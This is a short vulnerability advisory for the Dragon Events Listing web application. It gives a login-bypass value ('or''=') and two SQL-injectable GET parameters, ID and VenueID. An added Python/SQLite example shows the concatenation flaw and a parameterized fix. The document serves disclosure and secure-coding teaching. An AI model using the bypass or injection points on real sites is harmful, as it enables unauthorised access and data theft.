Vendor site: http://www.dragoninternet.net/
Product: Dragon Events Listing
Bug: login bypass & SQL injection
Risk: high

Login bypass:
username: 'or''='
passwd: 'or''='

SQL injection (GET):
http://site.com/event_searchdetail.asp?ID='[sql]
http://site.com/venue_detail.asp?VenueID='[sql]

Laurent Gaffié & Benjamin Mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx
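
Added example, not part of the original advisory and not the vendor's code: it shows why the reported login value passes a string-concatenated query and how bound parameters and numeric validation of ID / VenueID close both issues. The product's real ASP code and schema are not shown in the advisory, so the tables, columns and function names below are assumptions, modelled here with Python and SQLite.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in schema; the product's real tables are not in the advisory.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, passwd TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-password')")
    db.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO events VALUES (1, 'Constructed event')")
    return db

def login_concat(db, username, passwd):
    # Vulnerable pattern (assumed): input is spliced into the SQL text, so the
    # advisory's value turns the WHERE clause into  ... OR ''=''  (always true).
    sql = ("SELECT COUNT(*) FROM users WHERE username='" + username +
           "' AND passwd='" + passwd + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_param(db, username, passwd):
    # Hardened: values are bound as parameters, so quotes remain data.
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND passwd=?"
    return db.execute(sql, (username, passwd)).fetchone()[0] > 0

def event_by_id(db, raw_id):
    # Hardened GET handler for ID / VenueID style parameters:
    # accept only a short run of ASCII digits, then bind the integer.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None
    row = db.execute("SELECT title FROM events WHERE id=?", (int(raw_id),)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    reported = "'or''='"  # value quoted in the advisory
    print("concatenated query accepts it:", login_concat(db, reported, reported))
    print("parameterized query accepts it:", login_param(db, reported, reported))
    print("lookup with ID=1:", event_by_id(db, "1"))
    print("lookup with ID=':", event_by_id(db, "'"))
```

The password is stored in plain text only to keep the comparison short; a real login would compare against a salted password hash.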